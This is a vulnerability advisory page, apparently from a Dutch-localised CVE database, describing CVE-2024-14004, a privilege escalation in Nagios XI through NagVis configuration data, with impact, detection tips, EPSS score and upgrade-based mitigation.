Platform
nagios
Component
nagios-xi
Opgelost in
2024R1.2
CVE-2024-14004 describes a privilege escalation vulnerability discovered in Nagios XI. This flaw allows authenticated users to potentially gain elevated privileges on the Nagios XI system by manipulating NagVis configuration data within the nagvis.conf file. The vulnerability affects versions prior to 2024R1.2, and a fix is available in version 2024R1.2.
Successful exploitation of CVE-2024-14004 could allow an attacker to gain root or administrator-level access to the Nagios XI server. This could lead to complete system compromise, including data breaches, modification of system configurations, and installation of malicious software. The attacker would need to be an authenticated user within the Nagios XI environment to exploit this vulnerability, but the impact of a successful attack is significant. The ability to manipulate NagVis configuration provides a relatively straightforward attack vector if an attacker can gain initial access.
CVE-2024-14004 was publicly disclosed on 2025-10-30. The vulnerability's ease of exploitation, combined with Nagios XI's widespread use in monitoring environments, suggests a potential for active exploitation. There are currently no publicly available proof-of-concept exploits, but the vulnerability is not considered complex to exploit. It has not been added to the CISA KEV catalog as of this writing.
Organizations heavily reliant on Nagios XI for monitoring critical infrastructure are particularly at risk. Environments with weak authentication practices or inadequate access controls to the Nagios XI web interface are also more vulnerable. Shared hosting environments where multiple users share a Nagios XI instance should be prioritized for patching.
• php: Examine Nagios XI web server access logs for unusual requests targeting NagVis configuration endpoints (e.g., /nagvis/config.php).
• php: Use grep to search the nagvis.conf file for unexpected or suspicious configuration entries.
• generic web: Monitor Nagios XI system resources (CPU, memory) for spikes that could indicate exploitation attempts.
• generic web: Check for unauthorized modifications to Nagios XI user accounts or permissions.
disclosure
Exploit Status
EPSS
0.10% (27% percentiel)
CISA SSVC
The primary mitigation for CVE-2024-14004 is to upgrade Nagios XI to version 2024R1.2 or later. If an immediate upgrade is not possible, review and restrict access to the nagvis.conf file, ensuring only authorized users can modify it. Implement strict input validation on all NagVis configuration parameters to prevent malicious data from being injected. Consider using a Web Application Firewall (WAF) to filter potentially malicious requests targeting NagVis configuration endpoints. After upgrading, confirm the fix by attempting to manipulate NagVis configuration as a standard authenticated user; the changes should be rejected.
Actualice Nagios XI a la versión 2024R1.2 o posterior. Esta actualización corrige la vulnerabilidad de escalada de privilegios relacionada con la configuración de NagVis. Consulte el registro de cambios de Nagios XI para obtener más detalles sobre la actualización.
Kwetsbaarheidsanalyses en kritieke waarschuwingen direct in uw inbox.
CVE-2024-14004 is a vulnerability in Nagios XI versions prior to 2024R1.2 that allows authenticated users to potentially gain elevated privileges by manipulating NagVis configuration data.
You are affected if you are running Nagios XI versions 0–2024R1.2. Upgrade to version 2024R1.2 or later to mitigate the vulnerability.
Upgrade Nagios XI to version 2024R1.2 or later. As a temporary workaround, restrict access to the nagvis.conf file and implement strict input validation.
While no public exploits are currently available, the vulnerability's ease of exploitation suggests a potential for active exploitation.
Refer to the official Nagios XI security advisory for detailed information and instructions: [https://support.nagios.com/kb/article/137379/nagios-xi-security-vulnerability-cve-2024-14004/]
Upload je dependency-bestand en kom direct te weten of deze en andere CVEs jou raken.